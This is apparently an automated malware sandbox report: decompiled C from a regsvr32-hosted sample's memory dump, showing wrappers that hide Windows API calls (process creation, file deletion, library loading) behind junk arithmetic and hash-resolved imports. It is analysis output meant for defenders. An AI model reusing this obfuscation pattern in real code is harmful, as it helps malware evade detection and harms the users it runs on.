Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: "
API String ID: 3098006287-1598837362
Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction ID: 1a728a365dd974809c00c6edccb7eb965df025456ba00ff0bec33be23b68e3bd
Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction Fuzzy Hash: 032123B5C1120DEBCF15DFA4D8499EEBBB4FF04318F108588E91566260E3B65B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002CA98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E002CA98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E002B9E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E002CBFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}

0x002ca994
0x002ca997
0x002ca99c
0x002ca9a1
0x002ca9a7
0x002ca9ae
0x002ca9b5
0x002ca9c2
0x002ca9c5
0x002ca9c8
0x002ca9cf
0x002ca9db
0x002ca9dc
0x002ca9e1
0x002ca9eb
0x002ca9f2
0x002ca9f9
0x002caa00
0x002caa17
0x002caa1a
0x002caa2b
0x002caa2e
0x002caa41
0x002caa4c
0x002caa51

APIs

CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 002CAA4C

Strings

ijp, xrefs: 002CA9EB

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: ijp
API String ID: 1725840886-2001787820
Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction ID: a0fd951b97ae22502f808eafb29cd94d36670145a7489d5dbf1795dba1106f86
Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction Fuzzy Hash: 2E2117B5D0520DFBEF04DFA4D98A9AEBBB5EB40304F10C19AE404AB250D7B59B549F84

Uniqueness

Uniqueness Score: -1.00%

Function 002B338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E002B338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E002B9E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E002CBFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}

0x002b3391
0x002b3396
0x002b339b
0x002b33a1
0x002b33a5
0x002b33ac
0x002b33b9
0x002b33bd
0x002b33c0
0x002b33c7
0x002b33d8
0x002b33db
0x002b33f2
0x002b33f5
0x002b33fc
0x002b3403
0x002b340a
0x002b340e
0x002b3415
0x002b341c
0x002b3427
0x002b342a
0x002b3431
0x002b3444
0x002b344f
0x002b3454

APIs

SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 002B344F

Strings

|[0, xrefs: 002B33FC

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: |[0
API String ID: 3080627654-3711761429
Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction ID: a91f7c50ac6c154c8e8c021df80261375bd53d20f31ee863c9b6ffcef373764b
Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction Fuzzy Hash: 262136B4D01209EFCF04DFA5C94AAEEBBB4FB00304F10828DE424AA250D7B96B548F90

Uniqueness

Uniqueness Score: -1.00%

Function 002CE373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E002CE373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E002B9E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E002CBFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}

0x002ce37a
0x002ce37d
0x002ce37f
0x002ce382
0x002ce384
0x002ce389
0x002ce392
0x002ce399
0x002ce3a0
0x002ce3a7
0x002ce3ae
0x002ce3b5
0x002ce3bc
0x002ce3c3
0x002ce3cf
0x002ce3d5
0x002ce3d8
0x002ce3df
0x002ce3e6
0x002ce3ed
0x002ce3f4
0x002ce40b
0x002ce413
0x002ce426
0x002ce42f
0x002ce435

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,002C3F2A,00000000), ref: 002CE42F

Strings

M8, xrefs: 002CE3ED

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: M8
API String ID: 2962429428-669864304
Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction ID: c8b5abf1e7f4d8e317bf41223bf5097bc27060f769bca04b40e00698ab6e38a7
Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction Fuzzy Hash: 981159B5D10209EFDF58DFA4C84A8DEBBB4EB40324F108299E824B6290D3B55B158F91

Uniqueness

Uniqueness Score: -1.00%

Function 002C46E0 Relevance: 1.6, APIs: 1, Instructions: 76
processCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E002C46E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E002B9E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E002CBFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}

0x002c46e8
0x002c46ed
0x002c46ef
0x002c46f2
0x002c46f5
0x002c46f8
0x002c46f9
0x002c46fc
0x002c46ff
0x002c4702
0x002c4703
0x002c4706
0x002c4709
0x002c470c
0x002c470d
0x002c4710
0x002c4713
0x002c4716
0x002c4717
0x002c4719
0x002c471e
0x002c4727
0x002c472e
0x002c4732
0x002c4739
0x002c4740
0x002c4747
0x002c474e
0x002c4755
0x002c475c
0x002c4763
0x002c476a
0x002c4771
0x002c477d
0x002c4783
0x002c4786
0x002c478d
0x002c47ae
0x002c47ca
0x002c47d1

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 002C47CA

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction ID: 2eadac54725b934290c80fd0f4fb206d3702d98c2b781ee84bdd0b09fd8da373
Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction Fuzzy Hash: E531F472900248FBDF559F95CD09CDEBF75FB89314F008148FA2462120D7769A60DF60

Uniqueness

Uniqueness Score: -1.00%

Function 002CBF1C Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E002CBF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002B9E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E002CBFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}

0x002cbf24
0x002cbf29
0x002cbf2b
0x002cbf2e
0x002cbf2f
0x002cbf30
0x002cbf33
0x002cbf36
0x002cbf39
0x002cbf3c
0x002cbf3f
0x002cbf42
0x002cbf43
0x002cbf44
0x002cbf49
0x002cbf53
0x002cbf5a
0x002cbf61
0x002cbf68
0x002cbf6c
0x002cbf70
0x002cbf77
0x002cbf7e
0x002cbf85
0x002cbf9c
0x002cbfa4
0x002cbfab
0x002cbfb2
0x002cbfb6
0x002cbfba
0x002cbfbe
0x002cbfd1
0x002cbfe8
0x002cbfef

APIs

CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 002CBFE8

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction ID: 8f6710748580465942882ffa54e9492e30a8d29f5106994f38e8444fd452acf2
Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction Fuzzy Hash: 3621077281020DBBCF15DF95C9098DFBFB5FB44748F008158F92562220D3B68A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002C1B22 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E002C1B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002B9E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E002CBFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}

0x002c1b2a
0x002c1b2d
0x002c1b2f
0x002c1b31
0x002c1b34
0x002c1b37
0x002c1b3a
0x002c1b3b
0x002c1b3c
0x002c1b41
0x002c1b50
0x002c1b54
0x002c1b61
0x002c1b64
0x002c1b6b
0x002c1b72
0x002c1b79
0x002c1b7d
0x002c1b84
0x002c1b8b
0x002c1b92
0x002c1b99
0x002c1ba0
0x002c1ba7
0x002c1bae
0x002c1bc2
0x002c1bc5
0x002c1bd8
0x002c1be5
0x002c1bec

APIs

RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 002C1BE5

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction ID: 61005ca1a14d888fb62c78175d5feaf378de460576cbb9ed141543b373c9823c
Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction Fuzzy Hash: FF2133B5D01208FBDF05DFA5C94A8EEBFB5FB80314F108089E914A6261D3B59B51DF61

Uniqueness

Uniqueness Score: -1.00%

Function 002C66C2 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002C66C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E002B9E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E002CBFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}

0x002c66cf
0x002c66e4
0x002c66e9
0x002c66f3
0x002c66f7
0x002c66fe
0x002c6705
0x002c670c
0x002c6710
0x002c6717
0x002c671e
0x002c6725
0x002c6729
0x002c672d
0x002c6734
0x002c673b
0x002c6742
0x002c6766
0x002c6777
0x002c677e

APIs

SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 002C6777

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction ID: 6c7c4741638d2085259df43dcbae4b695d7bc3c7abb9c56d5fe5b069dd4ccf4f
Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction Fuzzy Hash: 901144B2800208FBCF15DF95CC0A8DEBFB8EF85304F108198F92962210D3B28A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002BFCB5 Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E002BFCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E002B9E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E002CBFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}

0x002bfcbc
0x002bfcbf
0x002bfcc1
0x002bfcc3
0x002bfcc8
0x002bfcd6
0x002bfcdb
0x002bfce0
0x002bfce7
0x002bfcee
0x002bfcf5
0x002bfcfc
0x002bfd03
0x002bfd0d
0x002bfd13
0x002bfd16
0x002bfd1d
0x002bfd24
0x002bfd2b
0x002bfd4f
0x002bfd58
0x002bfd5e

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 002BFD58

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction ID: d2322f6a65c9b53eb48c1b4daaa2f2ff748c309e9f40c7d5484e1b730f2c3f6f
Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction Fuzzy Hash: 50115E71D00208EBDB08DFA5C84A8EEBBB5EB40304F10818DE429A6251DBB56B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 002B9EA8 Relevance: 1.5, APIs: 1, Instructions: 44
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E002B9EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E002B9E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E002CBFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}

0x002b9eaf
0x002b9eb2
0x002b9eb4
0x002b9eb8
0x002b9eb9
0x002b9ebe
0x002b9ec8
0x002b9ecf
0x002b9ed6
0x002b9edd
0x002b9ee1
0x002b9ee5
0x002b9eec
0x002b9ef3
0x002b9efa
0x002b9f01
0x002b9f08
0x002b9f0f
0x002b9f16
0x002b9f1d
0x002b9f24
0x002b9f48
0x002b9f51
0x002b9f57

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 002B9F51

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction ID: ca65a079cdaf8d5966e1b8ceebcdda1c05b16c92068b53b6216a5412aa0f1dbb
Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction Fuzzy Hash: D91148B1C11219EBDF48DFA4D80A8DEBBB4EF10318F108288E825A6250E7B45B548F91

Uniqueness

Uniqueness Score: -1.00%

Function 002BBA9C Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E002BBA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E002CBFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}

0x002bbaa2
0x002bbaa9
0x002bbaad
0x002bbab4
0x002bbabb
0x002bbabf
0x002bbac6
0x002bbacd
0x002bbad4
0x002bbadb
0x002bbae6
0x002bbaee
0x002bbaf6
0x002bbafa
0x002bbb12
0x002bbb1d

APIs

ExitProcess.KERNEL32(00116E69), ref: 002BBB1D

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction ID: a39d6dee38d8ac3c4a652a1f71df531831740dd54c991b8fcf38bf3aadde3d6f
Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction Fuzzy Hash: D201E275D1120CEB8B04DFA4CA4A9DEBBB4FB04348F108699E821B6211D7B55B14CF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002CAA52 Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002CAA52() {

				return  *[fs:0x30];
			}

0x002caa58

Memory Dump Source

Source File: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true

Associated: 00000006.00000002.715626500.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.715735499.00000000002D4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

